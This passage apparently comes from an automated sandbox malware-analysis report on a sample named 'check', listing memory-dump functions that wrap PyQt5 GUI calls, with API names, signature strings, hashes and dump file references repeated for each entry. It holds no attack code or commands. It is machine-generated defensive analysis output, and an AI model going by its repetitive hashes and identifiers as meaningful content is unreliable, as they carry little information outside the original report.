                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0749edb9377bd6908af917fce7d81664574831aaae775d81e906991e8190bd69
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B211FB37A19A46C6EB10DF25E8496A933A5FB44FC4F914032DA8E47320EF3DE559C704
                                                                                                                                                                                                                                          Function 00007FF89D9A3A10 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 39COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00007FF89DA59D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF89D9312CB), ref: 00007FF89DA59D32
                                                                                                                                                                                                                                          • ?colorProperty@QTextFormat@@QEBA?AVQColor@@H@Z.QT5GUI ref: 00007FF89D9A3A75
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?colorColor@@Format@@Property@Textmalloc
                                                                                                                                                                                                                                          • String ID: QTextFormat$colorProperty$colorProperty(self, propertyId: int) -> QColor
                                                                                                                                                                                                                                          • API String ID: 2985419813-556251507
                                                                                                                                                                                                                                          • Opcode ID: c37e459ebbf1ec6c7fde5545124aceafa061cc867046ae4f76762534b2b3d287
                                                                                                                                                                                                                                          • Instruction ID: ba2d03a90783a78aea49073fce1a7acbed04613fd046e38cbeaf34d275727f05
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c37e459ebbf1ec6c7fde5545124aceafa061cc867046ae4f76762534b2b3d287
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8E11E637A19A46C6EB109F25E8496A933A5FB44FC4F914032DA8E47320EF3DE959C744
                                                                                                                                                                                                                                          Function 00007FF89D949DF0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 39COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00007FF89DA59D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF89D9312CB), ref: 00007FF89DA59D32
                                                                                                                                                                                                                                          • ?findBlock@QTextDocument@@QEBA?AVQTextBlock@@H@Z.QT5GUI ref: 00007FF89D949E55
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Text$?findBlock@Block@@Document@@malloc
                                                                                                                                                                                                                                          • String ID: QTextDocument$findBlock$findBlock(self, pos: int) -> QTextBlock
                                                                                                                                                                                                                                          • API String ID: 1896254834-149533175
                                                                                                                                                                                                                                          • Opcode ID: 7ea587432a48e21168dfd5b0891de4ed5eedd74afe96cc759f3e45b94cb0abd9
                                                                                                                                                                                                                                          • Instruction ID: 7f6372f6384fdf15dc0d172a940acb6d102769b15be5024f632cd61a17d22556
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7ea587432a48e21168dfd5b0891de4ed5eedd74afe96cc759f3e45b94cb0abd9
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0C110D37A19A46C6EB10DF25E8496A933A5FB48FC0F914036DA8E47320EF3DE959C704
                                                                                                                                                                                                                                          Function 00007FF89D9A3DD0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 39COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00007FF89DA59D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF89D9312CB), ref: 00007FF89DA59D32
                                                                                                                                                                                                                                          • ?penProperty@QTextFormat@@QEBA?AVQPen@@H@Z.QT5GUI ref: 00007FF89D9A3E35
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?penFormat@@Pen@@Property@Textmalloc
                                                                                                                                                                                                                                          • String ID: QTextFormat$penProperty$penProperty(self, propertyId: int) -> QPen
                                                                                                                                                                                                                                          • API String ID: 3949166683-87781968
                                                                                                                                                                                                                                          • Opcode ID: c8296d657329e614c622bd9ed1b0a5403f7402fa91bb397124bee19a864de731
                                                                                                                                                                                                                                          • Instruction ID: 1131e70c61efa9d9346955c6aca6880923cc1324582bdd11a6a7657d737842c3
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c8296d657329e614c622bd9ed1b0a5403f7402fa91bb397124bee19a864de731
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B4110D37A19A46C6EB10DF15E8496A933A5FB44FC0F914032DA8E47320EF3DE959C704
                                                                                                                                                                                                                                          Function 00007FF89D99DE80 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00007FF89DA59D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF89D9312CB), ref: 00007FF89DA59D32
                                                                                                                                                                                                                                          • ?next@QTextBlock@@QEBA?AV1@XZ.QT5GUI ref: 00007FF89D99DED8
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?next@Block@@Textmalloc
                                                                                                                                                                                                                                          • String ID: QTextBlock$next$next(self) -> QTextBlock
                                                                                                                                                                                                                                          • API String ID: 808233332-3118153420
                                                                                                                                                                                                                                          • Opcode ID: 10f093acd2bf5e27997c62c6261b18a9c6878dd62ab29fbf4f31a77442d88ba0
                                                                                                                                                                                                                                          • Instruction ID: 84dc374db895f77e41cbf6b6777ded32f527e882bef729ee11f8361aa3e7b96d
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 10f093acd2bf5e27997c62c6261b18a9c6878dd62ab29fbf4f31a77442d88ba0
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 50110977A09A4695EB109F65E8496A937A4FB44FD0F918032C98E07320EF7CE559C744
                                                                                                                                                                                                                                          Function 00007FF89D94BA80 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00007FF89DA59D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF89D9312CB), ref: 00007FF89DA59D32
                                                                                                                                                                                                                                          • ?adjoint@QTransform@@QEBA?AV1@XZ.QT5GUI ref: 00007FF89D94BAD8
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?adjoint@Transform@@malloc
                                                                                                                                                                                                                                          • String ID: QTransform$adjoint$adjoint(self) -> QTransform
                                                                                                                                                                                                                                          • API String ID: 1382169850-3274404985
                                                                                                                                                                                                                                          • Opcode ID: 1df194f377685806da0020952fbcac32e83973beafc58f15b43cb8874f2c94c3
                                                                                                                                                                                                                                          • Instruction ID: 38c4071520ec8b2c1183ebeb7dc4b2d0f6d2f1389f12200622abf1927710725f
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1df194f377685806da0020952fbcac32e83973beafc58f15b43cb8874f2c94c3
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2A113937A08A86C1EB109F25E8496A933E4FB44FD4F918032DA8E07720EF7CE959C744
                                                                                                                                                                                                                                          Function 00007FF89D95DE90 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00007FF89DA59D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF89D9312CB), ref: 00007FF89DA59D32
                                                                                                                                                                                                                                          • ?requestedFormat@QWindow@@QEBA?AVQSurfaceFormat@@XZ.QT5GUI ref: 00007FF89D95DEE8
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?requestedFormat@Format@@SurfaceWindow@@malloc
                                                                                                                                                                                                                                          • String ID: QWindow$requestedFormat$requestedFormat(self) -> QSurfaceFormat
                                                                                                                                                                                                                                          • API String ID: 3683396542-1982314141
                                                                                                                                                                                                                                          • Opcode ID: a2047704e4ac0fa1665ac9f1753bebbae1b10dd7b7cd451892560f665a93fd90
                                                                                                                                                                                                                                          • Instruction ID: a6cd9d5199885e9be5174076a4ec27ac531ba6a2b8698e130a90f9cfe509bc04
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a2047704e4ac0fa1665ac9f1753bebbae1b10dd7b7cd451892560f665a93fd90
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BC110577A08A46C2EB109F65E8896A933A4FB44FD4F918032DA9E07324EF7CE559C744
                                                                                                                                                                                                                                          Function 00007FF89D983E90 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00007FF89DA59D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF89D9312CB), ref: 00007FF89DA59D32
                                                                                                                                                                                                                                          • ?creator@QPdfWriter@@QEBA?AVQString@@XZ.QT5GUI ref: 00007FF89D983EE8
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?creator@String@@Writer@@malloc
                                                                                                                                                                                                                                          • String ID: QPdfWriter$creator$creator(self) -> str
                                                                                                                                                                                                                                          • API String ID: 2678230333-1028462170
                                                                                                                                                                                                                                          • Opcode ID: dd94886dfbcd19c62edb04a51217b5ffd298c5dacebf08897f8c82cadd198b2e
                                                                                                                                                                                                                                          • Instruction ID: 0bf84c78734027bb0633782720e96bec964f8950c36bb117dda17f7ee62a9096
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: dd94886dfbcd19c62edb04a51217b5ffd298c5dacebf08897f8c82cadd198b2e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0A113977A08A4682EB109F65E84A6A933A4FB44FD0F918032DA8E47320EF7DE559C744
                                                                                                                                                                                                                                          Function 00007FF89D95BEE0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00007FF89DA59D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF89D9312CB), ref: 00007FF89DA59D32
                                                                                                                                                                                                                                          • ?format@QTextInlineObject@@QEBA?AVQTextFormat@@XZ.QT5GUI ref: 00007FF89D95BF38
                                                                                                                                                                                                                                          Strings
